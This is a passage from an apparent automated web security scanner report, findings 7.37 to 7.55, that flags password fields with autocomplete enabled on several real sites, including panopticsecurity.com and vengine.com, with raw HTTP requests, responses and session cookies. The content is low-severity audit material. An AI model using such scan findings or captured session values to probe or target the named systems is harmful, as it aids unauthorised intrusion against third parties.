<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equ
...[SNIP]...
<td>
<form action="j_security_check" method=post name="login">
<input type="hidden" name="partner" value="Comodo" />
...[SNIP]...
<td><input type="password" size="25" name="j_password" value="" tabIndex="2" /></td>
...[SNIP]...

7.37. https://www.panopticsecurity.com/PCICS/MerController/doGetLocationManagement  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.panopticsecurity.com
Path:   /PCICS/MerController/doGetLocationManagement

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /PCICS/MerController/doGetLocationManagement HTTP/1.1
Host: www.panopticsecurity.com
Connection: keep-alive
Referer: https://www.panopticsecurity.com/PCICS/MerController/doStart?partner=Comodo
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=c48a63af3a1fe42b1ac75b96be64

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:30:26 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
Pragma: No-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 17:00:00 MST
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 8694


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UT
...[SNIP]...
<br />
<form name="locationManager" action="/PCICS/MerController/doLocationManagement" method="post" onsubmit="return confirmLocationManagerFormSubmission();">
<input type="hidden" name="isCopySAQAnswers" value="No" />
...[SNIP]...
<td><input type="password" name="userPassword" value="" size="32" /></td>
...[SNIP]...

7.38. https://www.panopticsecurity.com/PCICS/MerController/doMetaQuestion  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.panopticsecurity.com
Path:   /PCICS/MerController/doMetaQuestion

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

POST /PCICS/MerController/doMetaQuestion HTTP/1.1
Host: www.panopticsecurity.com
Connection: keep-alive
Referer: https://www.panopticsecurity.com/PCICS/MerController/doMetaQuestions
Content-Length: 203
Cache-Control: max-age=0
Origin: https://www.panopticsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=c48a63af3a1fe42b1ac75b96be64

partner=Comodo&theAnswer+to+Do+you+have+a+POS+terminal%2C+or+other+Payment+Application%2C+andourForwardSlashMarkeror+an+Imprint+Machine+%28ourDoubleQuoteMarkerknuckle-busterourDoubleQuoteMarker%29%3F=
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:30:38 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 3992

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equ
...[SNIP]...
<td>
<form action="j_security_check" method=post name="login">
<input type="hidden" name="partner" value="Comodo" />
...[SNIP]...
<td><input type="password" size="25" name="j_password" value="" tabIndex="2" /></td>
...[SNIP]...

7.39. https://www.panopticsecurity.com/PCICS/MerController/doMetaQuestions  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.panopticsecurity.com
Path:   /PCICS/MerController/doMetaQuestions

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /PCICS/MerController/doMetaQuestions HTTP/1.1
Host: www.panopticsecurity.com
Connection: keep-alive
Referer: https://www.panopticsecurity.com/PCICS/MerController/doStart98387ea42c7965f4e9e68c9f?partner=Comodo
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TemporaryTestCookie=yes; JSESSIONID=c4b181d68f939faf4b586b274a3e

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:31:45 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
Pragma: No-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 17:00:00 MST
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 3992

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equ
...[SNIP]...
<td>
<form action="j_security_check" method=post name="login">
<input type="hidden" name="partner" value="Comodo" />
...[SNIP]...
<td><input type="password" size="25" name="j_password" value="" tabIndex="2" /></td>
...[SNIP]...

7.40. https://www.panopticsecurity.com/PCICS/MerController/doReviewMeta  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.panopticsecurity.com
Path:   /PCICS/MerController/doReviewMeta

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

POST /PCICS/MerController/doReviewMeta HTTP/1.1
Host: www.panopticsecurity.com
Connection: keep-alive
Referer: https://www.panopticsecurity.com/PCICS/MerController/doUpdateFundamentalAnswers?partner=Comodo
Content-Length: 60
Cache-Control: max-age=0
Origin: https://www.panopticsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TemporaryTestCookie=yes; JSESSIONID=c4b181d68f939faf4b586b274a3e

partner=Comodo&answersFine=No+Changes+%28take+me+to+SAQ+D%29

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:32:25 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 3992

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equ
...[SNIP]...
<td>
<form action="j_security_check" method=post name="login">
<input type="hidden" name="partner" value="Comodo" />
...[SNIP]...
<td><input type="password" size="25" name="j_password" value="" tabIndex="2" /></td>
...[SNIP]...

7.41. https://www.panopticsecurity.com/PCICS/MerController/doStart  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.panopticsecurity.com
Path:   /PCICS/MerController/doStart

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /PCICS/MerController/doStart?partner=Comodo HTTP/1.1
Host: www.panopticsecurity.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TemporaryTestCookie=yes; JSESSIONID=c4a271271e63e8096a1c0ea2124e

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:31:15 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
Pragma: No-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 17:00:00 MST
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 3992

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equ
...[SNIP]...
<td>
<form action="j_security_check" method=post name="login">
<input type="hidden" name="partner" value="Comodo" />
...[SNIP]...
<td><input type="password" size="25" name="j_password" value="" tabIndex="2" /></td>
...[SNIP]...

7.42. https://www.panopticsecurity.com/PCICS/MerController/doUpdateFundamentalAnswers  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.panopticsecurity.com
Path:   /PCICS/MerController/doUpdateFundamentalAnswers

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /PCICS/MerController/doUpdateFundamentalAnswers?partner=Comodo HTTP/1.1
Host: www.panopticsecurity.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TemporaryTestCookie=yes; JSESSIONID=c4b181d68f939faf4b586b274a3e

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:32:14 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
Pragma: No-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 17:00:00 MST
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 3992

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equ
...[SNIP]...
<td>
<form action="j_security_check" method=post name="login">
<input type="hidden" name="partner" value="Comodo" />
...[SNIP]...
<td><input type="password" size="25" name="j_password" value="" tabIndex="2" /></td>
...[SNIP]...

7.43. https://www.panopticsecurity.com/PCICS/PanController/doInitUser  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.panopticsecurity.com
Path:   /PCICS/PanController/doInitUser

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /PCICS/PanController/doInitUser?partner=Comodo&path=Enter+ExpertPCI HTTP/1.1
Host: www.panopticsecurity.com
Connection: keep-alive
Referer: https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser?partner=Comodo
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=c479a71e3c244481eece1945c352

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:28:32 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
Pragma: No-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 17:00:00 MST
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 3992

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equ
...[SNIP]...
<td>
<form action="j_security_check" method=post name="login">
<input type="hidden" name="partner" value="Comodo" />
...[SNIP]...
<td><input type="password" size="25" name="j_password" value="" tabIndex="2" /></td>
...[SNIP]...

7.44. https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.panopticsecurity.com
Path:   /PCICS/PanController/doRegisterUser

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /PCICS/PanController/doRegisterUser?partner=Comodo HTTP/1.1
Host: www.panopticsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.panopticsecurity.com/Comodo/index.jsp?partner=Comodo
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=c448a660b087763e95615484a201
Connection: keep-alive
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:24:31 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 9488

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
</tr>
<form action = "/PCICS/PanController/doRegisterUser?partner=Comodo" method = "post" id="userRegistrationForm">
<tr>
...[SNIP]...
<td><input type="password" name="passwordValue" value="" size="32" maxlength="32" tabindex="10"/></td>
...[SNIP]...
<td><input type="password" name="passwordValueConfirm" value="" size="32" maxlength="32" tabindex="11"/></td>
...[SNIP]...

7.45. http://www.trustfax.com/login.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.trustfax.com
Path:   /login.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /login.html HTTP/1.1
Host: www.trustfax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:07:36 GMT
Server: Apache
X-Magnolia-Registration: Registered
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:07:36 GMT
Content-Length: 9335
X-TWA-Web: pa:28192
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
</h1> <form id="loginForm" class="form" method="post" action="https://secure.trustfax.com/UnifiedLogin.serv" name="loginForm"> <table border="0" cellspacing="2" cellpadding="1">
...[SNIP]...
<td><input type="password" name="password" /></td>
...[SNIP]...

7.46. http://www.trustix.com/login.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.trustix.com
Path:   /login.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /login.html HTTP/1.1
Host: www.trustix.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:26 GMT
Content-Type: text/html
Content-Length: 3852
Last-Modified: Fri, 15 Dec 2006 15:12:29 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title>Trust
...[SNIP]...
</p>

<form name="loginForm" method="post" action="https://secure.comodo.net/products/!hostedLogin" onsubmit="return    submitLoginForm(this.loginName, this.loginPassword)">
<table cellspacing="0" cellpadding="0" >
...[SNIP]...
<td><input type="password" size="20" maxlength="128" onfocus="this.select()" name="loginPassword" /></td>
...[SNIP]...

7.47. http://www.trustix.com/support/index.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.trustix.com
Path:   /support/index.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /support/index.html HTTP/1.1
Host: www.trustix.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:26 GMT
Content-Type: text/html
Content-Length: 11955
Last-Modified: Fri, 15 Dec 2006 15:12:29 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title>Trustix&
...[SNIP]...
</table>

<form name="form1" method="post" action="https://secure.comodo.net/products/!placeOrder" onsubmit="return checkForm(this);">
<input type="hidden" name="ap" value="trustix" />
...[SNIP]...
<td><input type="password" name="loginPassword" value="" /></td>
...[SNIP]...

7.48. http://www.vengine.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:38:35 GMT
Content-Type: text/html
Content-Length: 11760
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<title>Anti Phishing Site
...[SNIP]...
<div id="login" style="top: 46px;">

<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

7.49. http://www.vengine.com/corporate/about.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /corporate/about.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /corporate/about.html HTTP/1.1
Host: www.vengine.com
Proxy-Connection: keep-alive
Referer: http://www.vengine.com/support/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=252787086.1679413329.1316363998.1316363998.1316363998.1; __utmb=252787086.4.10.1316363998; __utmc=252787086; __utmz=252787086.1316363998.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:39:29 GMT
Content-Type: text/html
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 10580

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Vengine.com - Ant
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

7.50. http://www.vengine.com/corporate/contact.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /corporate/contact.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /corporate/contact.html HTTP/1.1
Host: www.vengine.com
Proxy-Connection: keep-alive
Referer: http://www.vengine.com/corporate/about.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=252787086.1679413329.1316363998.1316363998.1316363998.1; __utmb=252787086.5.10.1316363998; __utmc=252787086; __utmz=252787086.1316363998.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:39:31 GMT
Content-Type: text/html
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 10627

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Phishing Software
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

7.51. http://www.vengine.com/products/best_practices.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/best_practices.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /products/best_practices.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:12 GMT
Content-Type: text/html
Content-Length: 20164
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Phishing Protecti
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

7.52. http://www.vengine.com/products/features.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/features.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /products/features.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:10 GMT
Content-Type: text/html
Content-Length: 13411
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Website Authentic
...[SNIP]...
<div id="login" style="top: 46px;">

<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

7.53. http://www.vengine.com/products/free_tools.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/free_tools.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /products/free_tools.html HTTP/1.1
Host: www.vengine.com
Proxy-Connection: keep-alive
Referer: http://www.vengine.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=252787086.1679413329.1316363998.1316363998.1316363998.1; __utmb=252787086.2.10.1316363998; __utmc=252787086; __utmz=252787086.1316363998.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:39:14 GMT
Content-Type: text/html
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 15834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Anti Phishing Int
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

7.54. http://www.vengine.com/products/overview.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/overview.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /products/overview.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:10 GMT
Content-Type: text/html
Content-Length: 10595
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Phishing Attacks
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

7.55. http://www.vengine.com/products/prove_it.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/prove_it.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /products/prove_it.html HTTP/1.1
Host: www.vengine.com
Proxy-Connection: keep-alive
Referer: http://www.vengine.com/corporate/contact.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
